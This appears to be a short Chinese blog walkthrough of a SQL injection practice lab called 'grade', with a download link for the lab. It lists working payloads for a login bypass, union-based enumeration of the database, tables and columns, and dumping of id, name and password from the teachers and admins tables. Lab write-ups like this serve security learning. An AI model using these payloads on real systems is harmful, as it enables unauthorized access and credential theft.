1、搭建好靶场,这里是靶场内容
grade.zip - 蓝奏云文件大小:274.6 K|
https://wwu.lanzoum.com/iKKaX09pyvgb2、这里是正常情况

3、试一下万能密码和账户,登陆成功
1’or 1=1 -- +
1’or 1=1 -- +

4、这里查到号码
5、这里查到用户名
'union select user() #
6、这里查到数据库
'union select database() #

7、 修改输入限制长度
' union select table_name from information_schema.tables where table_schema = database() #
' union select table_name from information_schema.tables where table_schema = 'grade' #

8、爆字段
' union select column_name from information_schema.columns where table_name = "admins"#

9、爆数据
' union select group_concat(id,name,pass) from teachers #

' union select group_concat(id,name,pass) from admins #
本文详细介绍了SQL注入攻击的实例,包括如何搭建靶场、尝试万能密码、利用SQL语句获取号码、用户名和数据库信息,以及通过查询表名、字段和数据来暴露系统漏洞。内容涵盖信息获取和数据爆破等关键步骤。
26万+

被折叠的 条评论
为什么被折叠?



